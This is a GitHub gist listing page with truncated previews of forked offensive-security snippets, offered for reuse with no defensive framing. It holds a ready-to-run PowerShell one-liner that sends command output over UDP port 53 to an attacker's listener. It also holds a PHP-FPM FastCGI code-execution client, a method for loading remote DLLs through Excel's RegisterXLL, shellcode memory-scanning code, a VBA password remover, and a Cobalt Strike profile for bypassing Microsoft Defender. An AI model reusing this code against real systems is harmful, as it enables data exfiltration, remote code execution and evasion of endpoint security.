Skip to content

Instantly share code, notes, and snippets.

View yeshuibo's full-sized avatar

yeshuibo

100 followers · 1.1k following
View GitHub Profile
@yeshuibo
yeshuibo / Android.mk
Created May 24, 2017 09:43 — forked from ChiChou/Android.mk
WeChat dump
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_MODULE := loader
LOCAL_MODULE_TAGS := optional
LOCAL_SRC_FILES := loader.c
LOCAL_CPPFLAGS := -std=gnu++0x -Wall
LOCAL_LDLIBS := -L$(SYSROOT)/usr/lib -llog -pie -fPIE
@yeshuibo
yeshuibo / ClasspathHacker.java
Created April 2, 2020 10:51 — forked from dmarcuse/ClasspathHacker.java
Add jars to the classpath at runtime!
import java.io.File;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
/**
*
* @author apemanzilla
*
*/
@yeshuibo
yeshuibo / FindClass.java
Created June 12, 2020 13:56 — forked from fnmsd/FindClass.java
//Author:fnmsd
//Blog:https://blog.csdn.net/fnmsd
package aa;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.HashSet;
@yeshuibo
yeshuibo / FindClass_dfs.java
Created June 22, 2020 03:16 — forked from fnmsd/FindClass_dfs.java
//Author:fnmsd
//Blog:https://blog.csdn.net/fnmsd
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.lang.reflect.Field;
import java.util.HashSet;
import java.util.Scanner;
public class dfs {
@yeshuibo
yeshuibo / powershell-udp-rce-output.txt
Created July 12, 2020 04:10 — forked from ignis-sec/powershell-udp-rce-output.txt
powershell command to return executed command output from 53/udp.
# On your host:
# $ nc -lnvup 53
# Replace <HOSTIP> with ip of the listening machine
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));"
@yeshuibo
yeshuibo / remove_vba_project_password.bas
Created September 9, 2020 14:12 — forked from ndthanh/remove_vba_project_password.bas
https://hocexcel.online
Option Explicit
Private Const PAGE_EXECUTE_READWRITE = &H40
Private Declare Sub MoveMemory Lib "kernel32" Alias "RtlMoveMemory" _
(Destination As Long, Source As Long, ByVal Length As Long)
Private Declare Function VirtualProtect Lib "kernel32" (lpAddress As Long, _
ByVal dwSize As Long, ByVal flNewProtect As Long, lpflOldProtect As Long) As Long
@yeshuibo
yeshuibo / fpm.py
Created August 23, 2021 08:58 — forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False
@yeshuibo
yeshuibo / ExcelXLL.md
Created October 4, 2021 06:20 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@yeshuibo
yeshuibo / memBruteforce.cpp
Created October 15, 2021 01:48 — forked from aaaddress1/memBruteforce.cpp
Windows 32-bit Shellcode Design without TEB & fs:30h
// memBruteforce.cpp by aaaddress1@chroot.org
// brute search loaded moudules in memory
// rewrite from https://www.exploit-db.com/exploits/45293
#include <Windows.h>
#include <iostream>
#pragma warning(disable:4996)
bool isMemExist(size_t addr) {
int retv;
__asm {
@yeshuibo
yeshuibo / minimal-defender-bypass.profile
Created January 3, 2022 02:58 — forked from tothi/minimal-defender-bypass.profile
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";